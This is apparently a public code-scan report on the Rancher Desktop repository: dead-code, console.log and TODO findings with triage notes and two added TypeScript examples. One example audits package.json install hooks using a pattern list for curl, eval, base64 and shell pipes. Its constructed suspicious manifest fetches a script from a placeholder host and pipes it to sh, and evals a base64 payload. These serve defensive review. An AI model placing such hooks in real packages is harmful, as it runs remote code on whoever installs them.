webpack buildHttp: allowedUris allow-list bypass via URL userinfo (@) leading to build-time SSRF behavior
yarn.lock
low System graph quality Maintenance conf 1.00 48 TODO/FIXME markers
High count of TODO/FIXME/HACK markers — track them as issues so they're not forgotten.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: jest.config.js
Source file with no class/function declarations — possible config, dead code, or scratch file. The heuristic counts only top-level declarations, so it also fires on the Jest and Playwright spec files listed below (their bodies live inside describe/it callbacks) and on data and type modules; none of those is dead code on this evidence alone, and the spec files should have been excluded by the active tests filter.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: pkg/rancher-desktop/components/__tests__/PreferencesButton.spec.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: pkg/rancher-desktop/components/__tests__/StatusBar.spec.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: pkg/rancher-desktop/components/form/labeled-select-utils/labeled-select-pagination.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: pkg/rancher-desktop/components/SortableTable/actions.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: pkg/rancher-desktop/components/SortableTable/advanced-filtering.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: pkg/rancher-desktop/components/SortableTable/debug.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: pkg/rancher-desktop/components/SortableTable/grouping.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: pkg/rancher-desktop/components/SortableTable/paging.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: pkg/rancher-desktop/components/SortableTable/sortable-config.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: pkg/rancher-desktop/config/__tests__/commandLineOptions.spec.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: pkg/rancher-desktop/config/__tests__/settingsMigrations.spec.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: pkg/rancher-desktop/config/cookies.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: pkg/rancher-desktop/config/emptyStubForJSLinter.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: pkg/rancher-desktop/config/query-params.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: pkg/rancher-desktop/config/types.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: pkg/rancher-desktop/entry/router.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: pkg/rancher-desktop/integrations/__tests__/manageLinesInFile.spec.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: pkg/rancher-desktop/integrations/__tests__/windowsIntegrationManager.spec.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: pkg/rancher-desktop/middleware/i18n.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: pkg/rancher-desktop/middleware/indexRedirect.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: pkg/rancher-desktop/mixins/compact-input.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: pkg/rancher-desktop/mixins/vue-select-overrides.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: pkg/rancher-desktop/store/applicationSettings.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: pkg/rancher-desktop/store/page.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: pkg/rancher-desktop/store/snapshots.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: pkg/rancher-desktop/store/steve.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: pkg/rancher-desktop/types/components/labeledSelect.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: pkg/rancher-desktop/utils/__tests__/dockerUtils.spec.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: pkg/rancher-desktop/utils/__tests__/iterator.spec.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: pkg/rancher-desktop/utils/__tests__/kubeVersions.spec.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: pkg/rancher-desktop/utils/__tests__/networks.spec.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: pkg/rancher-desktop/utils/environment.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: pkg/rancher-desktop/utils/ipcRenderer.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: pkg/rancher-desktop/utils/processOutputInterpreters/__tests__/image-build-output.spec.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: pkg/rancher-desktop/utils/processOutputInterpreters/__tests__/image-non-build-output.spec.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: pkg/rancher-desktop/utils/processOutputInterpreters/__tests__/trivy-image-output.spec.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: pkg/rancher-desktop/utils/testUtils/setupVue.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: pkg/rancher-desktop/utils/type-helpers.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: screenshots/playwright-config.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: screenshots/screenshots.e2e.spec.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: screenshots/test-data/container-inspect.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: screenshots/test-data/containers.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: screenshots/test-data/images.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: screenshots/test-data/preferences.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: screenshots/test-data/snapshots.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: screenshots/test-data/volumes.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: scripts/dependencies/global.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: scripts/extension-data.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: scripts/lint-typescript.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph quality Tests conf 1.00 Low test-to-source ratio
103 tests / 487 src (ratio 0.21).
low System graph quality Integrity conf 1.00 Old/deprecated-named symbol `convertToRegistryLegacy` in e2e/utils/TestUtils.ts:59
Names with suffixes like `_old`, `_v1`, `_deprecated` or `Legacy` usually indicate replaced-but-not-removed code. Confirm and delete, or rename if it's the active version. Here the name reads as a deliberate conversion to an older registry format inside the e2e utilities, which is a plausible reason for the word; check the callers before treating it as leftover.
old marker · Dead code
low System graph cicd CI/CD security conf 1.00 package.json defines install-time lifecycle scripts
preinstall/install/postinstall/prepare scripts execute during dependency installation. Review them carefully for network calls, obfuscation, shell execution, or credential access. The same hooks run for every package yarn installs, so the review applies to the lockfile's dependencies as much as to this manifest; installing with scripts disabled (`enableScripts: false` in .yarnrc.yml, or `npm ci --ignore-scripts`) and running the needed build steps explicitly removes the implicit execution altogether.
package.json · CI/CD security · Supply chain · Npm
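An added example, not code from the scanned repository, that makes this review concrete: enumerate the install-time hooks in a manifest and flag the shapes named above (network fetches, inline eval, encoded payloads, pipes into a shell, credential environment variables). The two manifests, the pattern list and the rule names are constructed.

```typescript
// Added example (not Rancher Desktop code): list the install-time lifecycle
// scripts in a package.json and flag the behaviours the finding asks reviewers
// to look for. The two manifests and the pattern list are constructed.

const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Each pattern names one behaviour worth a human look; a hit is a prompt, not a verdict.
const RISKY_PATTERNS: Array<{ rule: string; re: RegExp }> = [
  { rule: 'network', re: /\b(curl|wget|Invoke-WebRequest)\b/ },
  { rule: 'inline-eval', re: /\bnode\s+(-e|--eval)\b|\beval\s*\(/ },
  { rule: 'encoded', re: /\b(base64|atob)\b/ },
  { rule: 'shell-pipe', re: /\|\s*(sh|bash|zsh|pwsh)\b/ },
  { rule: 'env-access', re: /\$\{?\w*(TOKEN|SECRET|PASSWORD|NPM_CONFIG)\w*\}?/ },
];

interface HookFinding { hook: string; command: string; rules: string[]; }

// Every install-time hook present in the manifest, with the rules it tripped.
function auditLifecycle(manifestJson: string): HookFinding[] {
  const scripts: Record<string, string> = JSON.parse(manifestJson).scripts ?? {};
  const out: HookFinding[] = [];
  for (const hook of INSTALL_HOOKS) {
    const command = scripts[hook];
    if (command === undefined) continue;
    const rules = RISKY_PATTERNS.filter((p) => p.re.test(command)).map((p) => p.rule);
    out.push({ hook, command, rules });
  }
  return out;
}

// Only the hooks that tripped a pattern; the rest still deserve a glance.
function flaggedHooks(manifestJson: string): HookFinding[] {
  return auditLifecycle(manifestJson).filter((f) => f.rules.length > 0);
}

// Constructed manifests: a benign one and one showing the shapes to watch for.
const BENIGN_MANIFEST = JSON.stringify({
  name: 'example-app',
  scripts: { postinstall: 'electron-builder install-app-deps', prepare: 'husky', test: 'jest' },
});
const SUSPICIOUS_MANIFEST = JSON.stringify({
  name: 'example-dep',
  scripts: {
    preinstall: 'curl -s https://example.invalid/setup.sh | sh',
    postinstall: 'node -e "eval(Buffer.from(\'...\', \'base64\').toString())"',
  },
});

for (const f of flaggedHooks(SUSPICIOUS_MANIFEST)) {
  console.log(`${f.hook}: [${f.rules.join(', ')}] ${f.command}`);
}
```

Run it over `node_modules/*/package.json` after a scripts-disabled install to see which dependencies would have executed code; the repository's own hooks are the smaller part of the surface.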
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — background.ts:154
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak. In this repository the flagged files are the Electron main process, backend modules and e2e specs rather than renderer components, so no toast helper applies; before editing, check whether the file shadows `console` with a module logger (a common idiom in this code base), in which case the call already writes to a log file and the finding is a false positive. Where it really is the global console, route the message through the project's logger instead.
Fq console leak
low System graph frontend Frontend quality conf 1.00 Stray `console.log` in TS/JS — e2e/credentials-server.e2e.spec.ts:92
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
low System graph frontend Frontend quality conf 1.00 80 occurrences Stray `console.log` in TS/JS
Replace with the toast helper, an error boundary, or remove. `console.warn` / `console.error` are acceptable. Why: Hygiene — easy to leak debug output. Rule id: fq.console-leak
Locations (file:line):
e2e/extensions.e2e.spec.ts:187
e2e/pages/nav-page.ts:67
e2e/startup-profiles.e2e.spec.ts:111
e2e/utils/ProfileUtils.ts:221
e2e/utils/TestUtils.ts:139
pkg/rancher-desktop/backend/backendHelper.ts:201
pkg/rancher-desktop/backend/containerClient/nerdctlClient.ts:458
pkg/rancher-desktop/backend/images/imageProcessor.ts:136
pkg/rancher-desktop/backend/images/mobyImageProcessor.ts:104
pkg/rancher-desktop/backend/images/nerdctlImageProcessor.ts:91
pkg/rancher-desktop/backend/k3sHelper.ts:284
pkg/rancher-desktop/backend/kube/client.ts:237
pkg/rancher-desktop/backend/kube/lima.ts:43
pkg/rancher-desktop/backend/kube/wsl.ts:35
pkg/rancher-desktop/backend/kubeconfig.ts:155
pkg/rancher-desktop/backend/lima.ts:407
pkg/rancher-desktop/backend/mock.ts:65
pkg/rancher-desktop/backend/steve.ts:142
pkg/rancher-desktop/backend/wsl.ts:306
pkg/rancher-desktop/components/ContainerShell.vue:188
pkg/rancher-desktop/components/Images.vue:306
pkg/rancher-desktop/components/Preferences/ModalBody.vue:50
pkg/rancher-desktop/components/SortableTable/debug.js:9
pkg/rancher-desktop/config/settingsImpl.ts:76
pkg/rancher-desktop/integrations/windowsIntegrationManager.ts:595
pkg/rancher-desktop/layouts/default.vue:159
pkg/rancher-desktop/main/commandServer/httpCommandServer.ts:133
pkg/rancher-desktop/main/credentialServer/httpCredentialHelperServer.ts:78
pkg/rancher-desktop/main/deploymentProfiles.ts:124
pkg/rancher-desktop/main/diagnostics/connectedToInternet.ts:40
pkg/rancher-desktop/main/extensions/extensions.ts:284
pkg/rancher-desktop/main/extensions/manager.ts:284
pkg/rancher-desktop/main/imageEvents.ts:101
pkg/rancher-desktop/main/networking/index.ts:65
pkg/rancher-desktop/main/serverHelper.ts:9
pkg/rancher-desktop/main/snapshots/snapshots.ts:118
pkg/rancher-desktop/main/tray.ts:216
pkg/rancher-desktop/main/update/index.ts:106
pkg/rancher-desktop/main/update/LonghornProvider.ts:177
pkg/rancher-desktop/pages/FirstRun.vue:203
pkg/rancher-desktop/store/diagnostics.ts:98
pkg/rancher-desktop/store/extensions.ts:65
pkg/rancher-desktop/store/prefs.js:168
pkg/rancher-desktop/store/snapshots.ts:25
pkg/rancher-desktop/sudo-prompt/test-concurrent.js:25
pkg/rancher-desktop/sudo-prompt/test.js:49
pkg/rancher-desktop/utils/__tests__/childProcess.spec.ts:43
pkg/rancher-desktop/utils/__tests__/dockerDirManager.spec.ts:23
pkg/rancher-desktop/utils/__tests__/safeRename.spec.ts:71
pkg/rancher-desktop/utils/backgroundProcess.ts:121
pkg/rancher-desktop/utils/commandLine.ts:40
pkg/rancher-desktop/utils/dockerDirManager.ts:81
pkg/rancher-desktop/utils/logging.ts:9
pkg/rancher-desktop/utils/object.js:70
pkg/rancher-desktop/utils/position.js:92
pkg/rancher-desktop/utils/processOutputInterpreters/trivy-image-output.ts:66
pkg/rancher-desktop/window/index.ts:96
scripts/build.ts:18
scripts/check-api-schema.ts:162
scripts/dependencies/go-source.ts:75
scripts/dependencies/moby-openapi.ts:82
scripts/dependencies/sudo-prompt.ts:16
scripts/dependencies/tar-archives.ts:26
scripts/dependencies/tools.ts:99
scripts/dev.ts:94
scripts/docker-cli-monitor.ts:57
scripts/e2e.ts:69
scripts/generateCliCode.ts:174
scripts/lib/build-utils.ts:304
scripts/lib/dependencies.ts:658
scripts/lib/download.ts:38
scripts/lib/extension-data.ts:84
scripts/lib/installer-win32.tsx:75
scripts/lib/sign-win32.ts:154
scripts/lint-go.ts:72
scripts/lint-typescript.ts:23
scripts/populate-update-server.ts:133
scripts/rddepman.ts:94
scripts/release-merge-to-main.ts:78
scripts/sign.ts:28
Triage note: the rule fires on every `console.log` it sees, with no regard for where the file runs. The 23 locations under `scripts/` are Node build, lint, dependency and release scripts, and the five under `e2e/` and three under `utils/__tests__/` are test code; in those, `console.log` is the process's normal stdout channel, and neither a toast helper nor an error boundary applies, so they are candidates for an FP vote rather than a code change. That leaves 49 locations under `pkg/rancher-desktop/` (three of which, `sudo-prompt/test.js`, `sudo-prompt/test-concurrent.js` and `SortableTable/debug.js`, are test or debug scripts by name). Those are the ones to read: in the Electron main process (`main/`), the backend (`backend/`) and the Vue components, a stray `console.log` ends up in the application log or the renderer console, and the value it prints decides whether the fix is removal or a downgrade to `console.warn` / `console.error`. Two deserve a specific check before any vote: `utils/logging.ts:9` is inside the logging helper itself and may be the intended sink, and `main/credentialServer/httpCredentialHelperServer.ts:78` is in the credential-helper server, where whatever is logged should be confirmed not to include credential material.
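The remediation is the same for all 80 locations, so the practical work is separating stray calls from intended ones and keeping them from coming back. The TypeScript below is an added example written for this page, not Rancher Desktop code and not Repobility's detector: a minimal re-implementation of the rule with path carve-outs for build scripts and tests, an ESLint flat-config entry that enforces the same policy (`no-console` with `warn` and `error` allowed), and a constructed sample source file to run it on. The carve-out globs and the sample file are assumptions drawn from the finding paths above, not project conventions.

```typescript
// Added example for this page; not Rancher Desktop code and not the Repobility
// detector. Re-implements the "stray console.log" rule with the carve-outs a
// triage pass would apply, plus the ESLint config that enforces the policy.

// Paths where console.log is the intended stdout channel: build/release scripts
// and test code. Assumed from the finding paths on this page, not a project rule.
const STDOUT_CHANNEL_PATHS: RegExp[] = [
  /^scripts\//,
  /^e2e\//,
  /\/__tests__\//,
  /\.spec\.[jt]sx?$/,
];

export function isConsoleLogAllowed(filePath: string): boolean {
  return STDOUT_CHANNEL_PATHS.some((re) => re.test(filePath));
}

export interface Finding {
  file: string;
  line: number; // 1-based, matching the file:line form of the report
  snippet: string;
}

// console.log(  and  console['log'](  /  console["log"]( ; warn/error do not match.
const CONSOLE_LOG = /\bconsole\s*(?:\.\s*log|\[\s*['"]log['"]\s*\])\s*\(/;
// A '//' that is not part of a URL scheme such as https://.
const LINE_COMMENT = /(^|[^:])\/\//;

export function findStrayConsoleLogs(filePath: string, source: string): Finding[] {
  if (isConsoleLogAllowed(filePath)) {
    return [];
  }
  const findings: Finding[] = [];
  const lines = source.split(/\r?\n/);
  let inBlockComment = false;

  for (let i = 0; i < lines.length; i++) {
    const raw = lines[i] ?? '';
    let line = raw;

    // Finish a block comment opened on an earlier line.
    if (inBlockComment) {
      const end = line.indexOf('*/');
      if (end === -1) {
        continue;
      }
      line = line.slice(end + 2);
      inBlockComment = false;
    }
    // Remove block comments closed on this line, then anything after one left open.
    line = line.replace(/\/\*[\s\S]*?\*\//g, '');
    const open = line.indexOf('/*');
    if (open !== -1) {
      line = line.slice(0, open);
      inBlockComment = true;
    }
    // Honour an inline ESLint suppression; otherwise drop the line comment.
    const comment = LINE_COMMENT.exec(line);
    if (comment) {
      const at = comment.index + (comment[1] ?? '').length;
      if (/eslint-disable-line\s+no-console/.test(line.slice(at))) {
        continue;
      }
      line = line.slice(0, at);
    }
    // String literals are not parsed: a "console.log(" inside a string would count.
    if (CONSOLE_LOG.test(line)) {
      findings.push({ file: filePath, line: i + 1, snippet: raw.trim() });
    }
  }
  return findings;
}

// Same file:line form as the findings on this page.
export function report(filePath: string, source: string): string[] {
  return findStrayConsoleLogs(filePath, source).map((f) => `${f.file}:${f.line}`);
}

// ESLint flat-config entries enforcing the policy: console.log is an error in
// application code (warn/error allowed, as the remediation says) and off where
// stdout is the intended channel. Plain config data; no ESLint import needed.
export const eslintNoConsoleConfig = [
  {
    files: ['**/*.{js,ts,tsx,vue}'],
    rules: { 'no-console': ['error', { allow: ['warn', 'error'] }] },
  },
  {
    files: ['scripts/**', 'e2e/**', '**/__tests__/**', '**/*.spec.{js,ts}'],
    rules: { 'no-console': 'off' },
  },
];

// Constructed sample source, not taken from the repository.
export const SAMPLE_SOURCE = [
  "import fs from 'fs';",                                              // 1
  "// console.log('commented out');",                                  // 2
  "/* console.log('one-line block comment'); */",                      // 3
  '/*',                                                                // 4
  "  console.log('inside a multi-line block comment');",               // 5
  '*/',                                                                // 6
  'export function load(path: string) {',                              // 7
  '  console.log("loading " + path);            // stray: reported',   // 8
  "  console.warn('fallback');                  // allowed",           // 9
  "  console['log']('bracket form');            // stray: reported",   // 10
  "  console.log('debug'); // eslint-disable-line no-console",         // 11
  "  fetch('https://example.invalid/'); console.log('after url');",   // 12
  "  return fs.readFileSync(path, 'utf8');",                           // 13
  '}',                                                                 // 14
].join('\n');
```

`report('pkg/rancher-desktop/backend/kubeconfig.ts', SAMPLE_SOURCE)` returns the three stray lines (8, 10 and 12) in `file:line` form; the same source under `scripts/build.ts` returns nothing because the path is exempt. The config array is ready to spread into an `eslint.config.js`; the `no-console` rule and its `allow` option are standard ESLint, the globs are the assumption.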

Showing first 300 of 309. Refine filters or use the findings page for deep search.

API access

This page is publicly accessible at: https://repobility.com/scan/e1e86596-98e4-49d3-9e75-8c9c146b8cc6/

To check status programmatically (no auth required):

curl -s https://repobility.com/api/v1/public/scan/e1e86596-98e4-49d3-9e75-8c9c146b8cc6/

Important — please don't re-submit the same URL repeatedly. The submission endpoint is idempotent: re-submitting the same git URL returns this same scan_token, not a new one. To re-scan this repo, sign up free and use the dashboard.